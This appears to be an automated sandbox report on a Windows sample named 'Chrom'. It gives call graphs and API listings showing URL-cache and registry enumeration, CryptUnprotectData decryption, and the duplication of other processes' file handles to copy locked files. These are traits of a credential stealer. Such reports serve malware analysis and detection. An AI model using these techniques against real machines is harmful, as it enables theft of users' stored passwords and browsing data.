calls 37530->37533 37532 413e2b 37531->37532 37532->37223 37533->37528 37533->37529 37533->37530 37534 413e30 255 API calls 37533->37534 37534->37533 37536 40b4a1 FindNextFileW 37535->37536 37537 40b482 FindFirstFileW 37535->37537 37538 40b4ba 37536->37538 37539 40b4b5 37536->37539 37537->37538 37541 40b4dc 37538->37541 37542 40a2de 6 API calls 37538->37542 37540 40b4e4 FindClose 37539->37540 37540->37538 37541->37223 37542->37541 37543->37090 37544->37077 37545->37149 37546->37173 37547->37173 37548->37191 37550 40a248 37549->37550 37550->37211 37551->37246 37553 415786 37552->37553 37554 41577c FreeLibrary 37552->37554 37555 408d81 free 37553->37555 37554->37553 37556 41578f 37555->37556 37557 408d81 free 37556->37557 37558 415797 37557->37558 37558->37063 37559->37072 37560->37062 37561->37131 37563 44ddb0 37562->37563 37564 4010b3 memset 37563->37564 37565 40a22f 2 API calls 37564->37565 37566 4010e9 wcsrchr 37565->37566 37567 4010fa 37566->37567 37568 4010fd memset 37566->37568 37567->37568 37569 406cd0 27 API calls 37568->37569 37570 401126 37569->37570 37571 40a2de 6 API calls 37570->37571 37572 40113a 37571->37572 38114 40a157 GetFileAttributesW 37572->38114 37574 401149 37575 401179 37574->37575 37576 40a22f 2 API calls 37574->37576 38115 40154c 37575->38115 37578 40115c 37576->37578 37580 406cd0 27 API calls 37578->37580 37584 401169 37580->37584 37581 4011ee CloseHandle 37583 4011f5 memset 37581->37583 37582 4011ce 38227 40a004 GetTempPathW 37582->38227 38148 40aca5 WideCharToMultiByte 37583->38148 37588 40a2de 6 API calls 37584->37588 37586 4011de CopyFileW 37586->37583 37588->37575 37589 40121d 38149 445e0f 37589->38149 37592 401487 37594 401492 DeleteFileW 37592->37594 37595 40149f 37592->37595 37593 406c77 27 API calls 37596 401249 37593->37596 37594->37595 37597 40b671 ??3@YAXPAX 37595->37597 38195 43a264 37596->38195 37599 4014a7 37597->37599 37599->37066 37600 40147f 38207 44577a 37600->38207 37603 401270 memset 38230 427363 17 API calls 
37603->38230 37604 401478 38257 426e79 124 API calls 37604->38257 37607 427363 17 API calls 37617 40125d 37607->37617 37610 40acda MultiByteToWideChar 37610->37617 37611 40acf3 MultiByteToWideChar 37611->37617 37614 401369 memcmp 37614->37617 37615 409f85 2 API calls 37615->37617 37616 407687 38 API calls 37616->37617 37617->37600 37617->37603 37617->37604 37617->37607 37617->37610 37617->37611 37617->37614 37617->37615 37617->37616 37619 4014f2 memset memcpy 37617->37619 37625 401413 memcmp 37617->37625 38231 42733f 16 API calls 37617->38231 38232 401003 SystemTimeToFileTime FileTimeToLocalFileTime 37617->38232 38233 4272ff 17 API calls 37617->38233 38234 42731f 17 API calls 37617->38234 38235 44d2f0 memset 37617->38235 38236 44d9d0 memset memcpy memcpy memcpy 37617->38236 38237 40b60e ??2@YAPAXI memcpy ??3@YAXPAX 37617->38237 38238 44d990 memcpy memcpy memcpy 37617->38238 38239 427117 37617->38239 38258 40acf3 MultiByteToWideChar 37619->38258 37622 40153c LocalFree 37622->37617 37625->37617 37626->37155 37627->37159 37629 40b4f7 37628->37629 37630 40b4ed FindClose 37628->37630 37629->37209 37630->37629 37632 409f96 37631->37632 37633 409f99 memcpy 37631->37633 37632->37633 37633->37130 37635 406cd0 27 API calls 37634->37635 37636 413e6c 37635->37636 37637 40a2de 6 API calls 37636->37637 37638 413e7c 37637->37638 38688 40a157 GetFileAttributesW 37638->38688 37640 413e8b 37641 413ea3 37640->37641 37642 4010a6 254 API calls 37640->37642 37643 406cd0 27 API calls 37641->37643 37642->37641 37644 413eaf 37643->37644 37645 40a2de 6 API calls 37644->37645 37646 413ebf 37645->37646 38689 40a157 GetFileAttributesW 37646->38689 37648 413ece 37649 413ee6 37648->37649 37650 4010a6 254 API calls 37648->37650 37649->37161 37650->37649 37651->37106 37652->37185 37653->37190 37654->37225 37655->37207 37656->37254 37657->37254 37658->37236 37659->37265 37660->37267 37661->37269 37663 416b94 17 API calls 37662->37663 37664 40c75c 37663->37664 37734 40c681 37664->37734 37669 40c86c 
37686 40aed1 37669->37686 37670 40b5f5 2 API calls 37671 40c7ab FindFirstUrlCacheEntryW 37670->37671 37672 40c864 37671->37672 37673 40c7cc wcschr 37671->37673 37674 40b671 ??3@YAXPAX 37672->37674 37675 40c80c FindNextUrlCacheEntryW 37673->37675 37676 40c7df 37673->37676 37674->37669 37675->37673 37677 40c821 GetLastError 37675->37677 37678 40aed1 9 API calls 37676->37678 37679 40c85b FindCloseUrlCache 37677->37679 37680 40c82c 37677->37680 37681 40c7ec wcschr 37678->37681 37679->37672 37683 40b5f5 2 API calls 37680->37683 37681->37675 37682 40c7fd 37681->37682 37684 40aed1 9 API calls 37682->37684 37685 40c83f FindNextUrlCacheEntryW 37683->37685 37684->37675 37685->37673 37685->37679 37828 40afa0 37686->37828 37689 40aef2 37689->37276 37690 40aef6 7 API calls 37690->37689 37833 40b7d1 free free 37691->37833 37693 40c88b 37694 406cd0 27 API calls 37693->37694 37695 40c895 37694->37695 37834 416466 RegOpenKeyExW 37695->37834 37697 40c8a2 37698 40c9bc 37697->37698 37699 40c8ad 37697->37699 37713 405153 37698->37713 37700 40aff4 4 API calls 37699->37700 37701 40c8c6 memset 37700->37701 37835 40b043 37701->37835 37704 40c9b3 RegCloseKey 37704->37698 37705 40c91f 37706 40c928 _wcsupr 37705->37706 37707 40aef6 7 API calls 37706->37707 37708 40c946 37707->37708 37709 40aef6 7 API calls 37708->37709 37710 40c95a memset 37709->37710 37711 40b043 37710->37711 37712 40c992 RegEnumValueW 37711->37712 37712->37704 37712->37706 37837 40503c 37713->37837 37717 409f85 2 API calls 37716->37717 37718 40acd3 _wcslwr 37717->37718 37719 40cae2 37718->37719 37894 40517d 37719->37894 37722 40cb0a wcslen 37897 4051d2 39 API calls 37722->37897 37723 40cbcb wcslen 37723->37290 37725 40cb25 37726 40cbc1 37725->37726 37898 4051a7 39 API calls 37725->37898 37900 4051fb 39 API calls 37726->37900 37729 40cb53 37729->37726 37730 40cb57 memset 37729->37730 37731 40cb81 37730->37731 37899 40ca37 44 API calls 37731->37899 37733->37283 37735 40b43e 9 API calls 37734->37735 37740 40c6be 37735->37740 
37736 40b477 9 API calls 37736->37740 37737 40c712 37739 40b4e4 FindClose 37737->37739 37738 40b3fa 2 API calls 37738->37740 37741 40c71d 37739->37741 37740->37736 37740->37737 37740->37738 37742 40c6df _wcsicmp 37740->37742 37743 40c681 35 API calls 37740->37743 37746 40c34b memset memset 37741->37746 37742->37740 37744 40c6f6 37742->37744 37743->37740 37759 40c532 22 API calls 37744->37759 37747 416b94 17 API calls 37746->37747 37748 40c39d 37747->37748 37749 40a2de 6 API calls 37748->37749 37750 40c3b6 37749->37750 37760 40a157 GetFileAttributesW 37750->37760 37752 40c3c5 37753 40c3de 37752->37753 37754 40a2de 6 API calls 37752->37754 37761 40a157 GetFileAttributesW 37753->37761 37754->37753 37756 40c3ed 37757 40c401 37756->37757 37762 40c210 37756->37762 37757->37669 37757->37670 37759->37740 37760->37752 37761->37756 37783 40bd7c 37762->37783 37764 40c2f1 37765 40c2fa DeleteFileW 37764->37765 37766 40c30e 37764->37766 37765->37766 37767 40b671 ??3@YAXPAX 37766->37767 37769 40c319 37767->37769 37768 40c27f 37768->37764 37806 40bed3 37768->37806 37771 40c322 CloseHandle 37769->37771 37772 40c32a 37769->37772 37771->37772 37774 408d81 free 37772->37774 37773 40c2d1 37776 40c2e2 37773->37776 37777 40c2da CloseHandle 37773->37777 37775 40c339 37774->37775 37780 408d81 free 37775->37780 37827 40b7d1 free free 37776->37827 37777->37776 37779 40c29e 37779->37773 37826 40c009 30 API calls 37779->37826 37781 40c341 37780->37781 37781->37757 37784 407a50 22 API calls 37783->37784 37785 40bd9a 37784->37785 37786 40bec9 37785->37786 37787 40bae3 74 API calls 37785->37787 37786->37768 37788 40bdc9 37787->37788 37788->37786 37789 40b5f5 ??2@YAPAXI ??3@YAXPAX 37788->37789 37790 40bdeb OpenProcess 37789->37790 37791 40beb0 37790->37791 37792 40be02 GetCurrentProcess DuplicateHandle 37790->37792 37793 40bebe 37791->37793 37796 407a50 22 API calls 37791->37796 37794 40bea8 CloseHandle 37792->37794 37795 40be2e GetFileSize 37792->37795 37797 40b671 ??3@YAXPAX 37793->37797 
37794->37791 37798 40a004 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 37795->37798 37796->37793 37797->37786 37799 40be48 37798->37799 37800 409c9b CreateFileW 37799->37800 37801 40be4f CreateFileMappingW 37800->37801 37802 40be69 MapViewOfFile 37801->37802 37803 40be9e CloseHandle CloseHandle 37801->37803 37804 40be99 CloseHandle 37802->37804 37805 40be7d WriteFile UnmapViewOfFile 37802->37805 37803->37794 37804->37803 37805->37804 37807 40beea 37806->37807 37808 4083cc 11 API calls 37807->37808 37809 40befd 37808->37809 37810 40bf05 memset 37809->37810 37811 40bff7 37809->37811 37815 40bf46 37810->37815 37812 4081df free ??3@YAXPAX 37811->37812 37814 40c002 37812->37814 37813 4086cb 13 API calls 37813->37815 37814->37779 37815->37813 37816 40838f SetFilePointerEx ReadFile 37815->37816 37817 40baae _wcsicmp 37815->37817 37818 40bfe1 37815->37818 37822 408c6a 8 API calls 37815->37822 37823 40b109 wcslen wcslen _memicmp 37815->37823 37824 40bfa2 _snwprintf 37815->37824 37816->37815 37817->37815 37819 40bfe6 free 37818->37819 37820 40bfef 37818->37820 37819->37820 37821 40b02a free 37820->37821 37821->37811 37822->37815 37823->37815 37825 40aef6 7 API calls 37824->37825 37825->37815 37826->37779 37827->37764 37830 40afa6 37828->37830 37829 40aee1 37829->37689 37829->37690 37830->37829 37831 40afc2 wcscmp 37830->37831 37832 40afbb _wcsicmp 37830->37832 37831->37830 37832->37830 37833->37693 37834->37697 37836 40b049 RegEnumValueW 37835->37836 37836->37704 37836->37705 37838 405151 37837->37838 37839 405046 37837->37839 37838->37290 37840 406cd0 27 API calls 37839->37840 37841 405050 37840->37841 37842 40ae2a 8 API calls 37841->37842 37843 405056 37842->37843 37882 406c77 37843->37882 37845 405064 strcpy strcat GetProcAddress 37846 406c77 27 API calls 37845->37846 37847 405095 37846->37847 37885 40502d GetProcAddress 37847->37885 37849 40509e 37850 406c77 27 API calls 37849->37850 37851 4050ab 37850->37851 37886 40502d GetProcAddress 37851->37886 37853 4050b4 
37854 406c77 27 API calls 37853->37854 37855 4050c1 37854->37855 37887 40502d GetProcAddress 37855->37887 37857 4050ca 37858 406c77 27 API calls 37857->37858 37859 4050d7 37858->37859 37888 40502d GetProcAddress 37859->37888 37861 4050e0 37862 406c77 27 API calls 37861->37862 37863 4050ed 37862->37863 37889 40502d GetProcAddress 37863->37889 37865 4050f6 37866 406c77 27 API calls 37865->37866 37867 405103 37866->37867 37890 40502d GetProcAddress 37867->37890 37869 40510c 37870 406c77 27 API calls 37869->37870 37871 405119 37870->37871 37891 40502d GetProcAddress 37871->37891 37873 405122 37874 406c77 27 API calls 37873->37874 37875 40512f 37874->37875 37892 40502d GetProcAddress 37875->37892 37877 405138 37878 406c77 27 API calls 37877->37878 37879 405145 37878->37879 37893 40502d GetProcAddress 37879->37893 37881 40514e 37881->37838 37883 406f91 27 API calls 37882->37883 37884 406c7c 37883->37884 37884->37845 37885->37849 37886->37853 37887->37857 37888->37861 37889->37865 37890->37869 37891->37873 37892->37877 37893->37881 37895 40503c 39 API calls 37894->37895 37896 405185 37895->37896 37896->37722 37896->37723 37897->37725 37898->37729 37899->37726 37900->37723 37902 407670 FreeLibrary 37901->37902 37903 4075d1 37902->37903 37904 40ae2a 8 API calls 37903->37904 37905 4075db 37904->37905 37906 4075e7 37905->37906 37907 407669 37905->37907 37908 406c77 27 API calls 37906->37908 37907->37295 37907->37297 37907->37298 37909 4075f1 GetProcAddress 37908->37909 37910 406c77 27 API calls 37909->37910 37911 40760b GetProcAddress 37910->37911 37912 406c77 27 API calls 37911->37912 37913 40761e GetProcAddress 37912->37913 37914 406c77 27 API calls 37913->37914 37915 407632 GetProcAddress 37914->37915 37916 406c77 27 API calls 37915->37916 37917 407646 GetProcAddress 37916->37917 37918 407655 37917->37918 37919 40765b 37918->37919 37920 407670 FreeLibrary 37918->37920 37919->37907 37920->37907 37922 407682 37921->37922 37923 407677 FreeLibrary 37921->37923 37922->37312 
37923->37922 37924->37303 37926 4076e2 37925->37926 37927 407692 37925->37927 37928 407700 37926->37928 37929 4076e9 CryptUnprotectData 37926->37929 37930 406cd0 27 API calls 37927->37930 37928->37303 37929->37928 37931 40769c 37930->37931 37932 40ae2a 8 API calls 37931->37932 37933 4076a2 37932->37933 37934 4076a9 37933->37934 37935 4076cb 37933->37935 37936 406c77 27 API calls 37934->37936 37935->37926 37937 4076d9 FreeLibrary 37935->37937 37938 4076b3 GetProcAddress 37936->37938 37937->37926 37938->37935 37939 4076c4 37938->37939 37939->37935 37941 416073 FreeLibrary 37940->37941 37942 41607e 37940->37942 37941->37942 37942->37315 37944 41686a 37943->37944 37945 4167dc 37943->37945 37944->37331 37944->37333 37946 406cd0 27 API calls 37945->37946 37947 4167e3 37946->37947 37948 40ae2a 8 API calls 37947->37948 37949 4167e9 37948->37949 37950 406c77 27 API calls 37949->37950 37951 4167f4 GetProcAddress 37950->37951 37952 406c77 27 API calls 37951->37952 37953 41680b GetProcAddress 37952->37953 37954 406c77 27 API calls 37953->37954 37955 41681c GetProcAddress 37954->37955 37956 406c77 27 API calls 37955->37956 37957 41682d GetProcAddress 37956->37957 37958 406c77 27 API calls 37957->37958 37959 41683e GetProcAddress 37958->37959 37960 406c77 27 API calls 37959->37960 37961 41684f GetProcAddress 37960->37961 37962 406c77 27 API calls 37961->37962 37963 416860 GetProcAddress 37962->37963 37963->37944 37964->37343 37965->37343 37966->37343 37967->37343 37968->37335 37970 412dca 37969->37970 37984 412f8e memset memset 37970->37984 37972 412e88 37997 40b7d1 free free 37972->37997 37973 412de0 memset 37976 412dd0 37973->37976 37975 412e90 37975->37350 37976->37972 37976->37973 37977 40a2de 6 API calls 37976->37977 37978 40a157 GetFileAttributesW 37976->37978 37979 40aef6 7 API calls 37976->37979 37977->37976 37978->37976 37979->37976 37981 40a610 GetFileTime CloseHandle 37980->37981 37982 40a626 CompareFileTime 37980->37982 37981->37982 37982->37350 37983->37351 37985 
416b94 17 API calls 37984->37985 37986 412fd9 37985->37986 37987 409cd8 2 API calls 37986->37987 37988 412fe0 wcscat 37987->37988 37989 416b94 17 API calls 37988->37989 37990 413002 37989->37990 37991 409cd8 2 API calls 37990->37991 37992 413009 wcscat 37991->37992 37998 412e96 37992->37998 37995 412e96 20 API calls 37996 413036 37995->37996 37996->37976 37997->37975 37999 412ea3 37998->37999 38000 40b43e 9 API calls 37999->38000 38008 412ed8 38000->38008 38001 412f7c 38002 40b4e4 FindClose 38001->38002 38003 412f87 38002->38003 38003->37995 38004 40b43e 9 API calls 38004->38008 38005 40b477 9 API calls 38005->38008 38006 40b3fa wcscmp wcscmp 38006->38008 38007 40b4e4 FindClose 38007->38008 38008->38001 38008->38004 38008->38005 38008->38006 38008->38007 38009 40aef6 7 API calls 38008->38009 38009->38008 38011 40a2de 6 API calls 38010->38011 38012 413531 38011->38012 38025 40a157 GetFileAttributesW 38012->38025 38014 41353d 38015 413548 6 API calls 38014->38015 38016 4136fd 38014->38016 38021 4135f0 38015->38021 38016->37372 38018 4135ff memset 38019 413637 wcscpy 38018->38019 38018->38021 38019->38021 38020 40a2de 6 API calls 38020->38021 38021->38016 38021->38018 38021->38020 38022 40aed1 9 API calls 38021->38022 38026 416716 38021->38026 38023 413657 memset memset _snwprintf wcscpy 38022->38023 38023->38021 38024->37376 38025->38014 38029 416312 38026->38029 38028 41673a 38028->38021 38030 41631f 38029->38030 38031 416325 38030->38031 38032 416377 GetPrivateProfileStringW 38030->38032 38033 416365 38031->38033 38034 416329 wcschr 38031->38034 38032->38028 38036 416369 WritePrivateProfileStringW 38033->38036 38034->38033 38035 416337 _snwprintf 38034->38035 38035->38036 38036->38028 38037->37381 38039 406cd0 27 API calls 38038->38039 38040 404f7e 38039->38040 38041 40a2de 6 API calls 38040->38041 38042 404f8e 38041->38042 38067 40a157 GetFileAttributesW 38042->38067 38044 404f9d 38045 404fb4 38044->38045 38068 404b0a 241 API calls 38044->38068 38046 406cd0 27 API 

Control-flow Graph
APIs
• memset.MSVCRT ref: 0040BB0B
  • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32
  • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
  • Part of subcall function 00413A57: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
  • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
• _wcsicmp.MSVCRT ref: 0040BC10
• _wcsicmp.MSVCRT ref: 0040BC23
• _wcsicmp.MSVCRT ref: 0040BC36
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BC4A
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040BC90
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040BC9F
• memset.MSVCRT ref: 0040BCBD
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040BCF0
• _wcsicmp.MSVCRT ref: 0040BD10
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040BD50
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
• Instruction ID: 29761171d8d6f99e34678da7c42ad3d9b616dea413bdd79b79df07308111e2da
• Opcode Fuzzy Hash: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
• Instruction Fuzzy Hash: E2815971900209EFDB10EF95CC85AAEBBB5FF44305F20447AE905B7291D739AE80CB98

Control-flow Graph
APIs
  • Part of subcall function 00408D81: free.MSVCRT ref: 00408D88
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 004157B7
• memset.MSVCRT ref: 004157CC
• Process32FirstW.KERNEL32(00000000,?), ref: 004157E8
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 0041582D
• memset.MSVCRT ref: 00415854
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00415889
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004158A3
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004158F5
• free.MSVCRT ref: 0041590E
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00415957
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00415967
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
• Instruction ID: 5ea73396ca473a1f837e0a83f3483b5d1fff5a6958d458d66b17e1ba5df2901d
                                                                                                                                                        • Opcode Fuzzy Hash: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
                                                                                                                                                        • Instruction Fuzzy Hash: 4B5179B2800218EBDB10EF55CC84ADEB7B9AF95304F1141ABE518E3251D7755E84CF69
APIs
  • Part of subcall function 0041A5D7: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
  • Part of subcall function 0041A5D7: malloc.MSVCRT ref: 0041A60E
  • Part of subcall function 0041A5D7: free.MSVCRT ref: 0041A61E
  • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A729
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A751
• free.MSVCRT ref: 0041A75A
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
• Instruction ID: 68c13852fb7afd5d8e0c76ce401d57be7323acd7ffb7733afae93f72ee07f9cd
• Opcode Fuzzy Hash: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
• Instruction Fuzzy Hash: F1216576802218AEEB12ABA4CD44DEF77BCEF05304F1404A7E551D7181E6788FD587A6
APIs
• CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
  • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
  • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
• GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
• FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 767404330-0
• Opcode ID: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
• Instruction ID: d423364176a6c8dd7e4ff5da1a82baf2de462266435030bf45fa2c9e15a2548a
• Opcode Fuzzy Hash: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
• Instruction Fuzzy Hash: 6C018471504A01DED6215F55CC4581BFAE9EB90750B208C3FF0D6E21A0D775AC40DB29
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B48D
• FindNextFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4A9
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
• Instruction ID: 0f501c6d627a291db363f91b892f93565970ce46203e449eca58727f5cb945cd
• Opcode Fuzzy Hash: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
• Instruction Fuzzy Hash: F9F06276501A119BC721DB74DC459D773D8DB85320B25063EF56AE33C1EF3CAA098768
APIs
• memset.MSVCRT ref: 0041A8E3
• GetSystemInfo.KERNELBASE(004735C0,?,00000000,004453C0,?,?,?,?,?,?,?,?), ref: 0041A8EC
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
• Instruction ID: 008e5f0b5c38a1f1cab39b63f665e63cad528b58ea392fd89bbd5874da5d37fe
• Opcode Fuzzy Hash: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
• Instruction Fuzzy Hash: 95E09271A066206BE3117B726C06BDF26D4AF42349F05043BFD0996243E72C8A85829E

Control-flow Graph (rendered graph of the function at 413f68 not reproduced; legend: Executed / Not Executed)
APIs
• memset.MSVCRT ref: 00413FEF
• wcsrchr.MSVCRT ref: 00414007
• memset.MSVCRT ref: 0041413A
• memset.MSVCRT ref: 00414152
